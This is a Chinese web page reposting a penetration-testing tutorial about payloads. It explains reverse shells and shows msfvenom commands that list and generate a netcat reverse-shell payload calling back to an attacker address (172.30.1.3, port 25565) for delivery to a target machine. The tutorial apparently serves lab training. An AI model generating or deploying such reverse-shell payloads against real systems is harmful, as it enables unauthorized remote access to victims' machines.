最新要闻

广告

手机

iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?

iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?

警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案

警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案

家电

环球要闻:渗透测试之Payload

来源:博客园

一、什么是Payload

一般地在渗透测试中,Payload(攻击载荷),是允许连接到监听器的一个可执行文件或是一段代码


(资料图片仅供参考)

其目的是在受害主机和攻击者之间建立连接,从而获取到被害主机的一个Shell;

此Shell可以是一个正向Shell,也可以是一个反向Shell

二、Payload生成器:msfvenom

听其名而知其意:Payload生成器就是生成一个连接到监听器的可执行文件或一段代码,这里我们使用msfvenom

1、工具介绍

是一个独立于 msf 的 Payload 生成器

此工具替代了:msfpayload(生成payload)

msfencode(对payload编码, 为了绕过一些杀毒软件的检测)

ps:这里我们不演示对payload的编码

2、选项

  • --list payloads查看支持的Payloads  
  • -p指定要使用的Payload  
  • --list-options可以查看此payload需要的选项与参数

3、使用netcat实现一个Payload

实际上能实现Payload的工具或语言很多,可以根据具体情况进行选择

1)查找基于netcat实现的Payload:

cat msfvenom_payloads | grep "netcat"

我这里是直接把Payload的列表保存到一个文件了,因为每次查找很慢

这里我们可以使用 cmd/unix/reverse_netcat 这个payload

2)查看此Payload的选项

msfvenom -p cmd/unix/reverse_netcat --list-options

注意:由于我们选择的是反向Shell,所以我们的角度要站在受害主机上,对于受害主机来说,它需要去连接我们,所以这里的 LHOST与LPORT就是我们本机的地址与端口

3)生成Payload并投递执行

1 msfvenom -p cmd/unix/reverse_netcat lhost=172.30.1.3 lport=25565

结果:

这就是我们要投递给靶机,让其执行的代码;由于在高度安全的环境下,nc直接去连并带着自己的Shell是不被允许的,这坨命令的意思就是通过管道与FIFO来实现获取Shell的效果

投递的方式与原理请看:通过python获取靶机的反弹Shell [靶机实战] - CrazyLoe - 博客园 (cnblogs.com)

4)结果

关键词: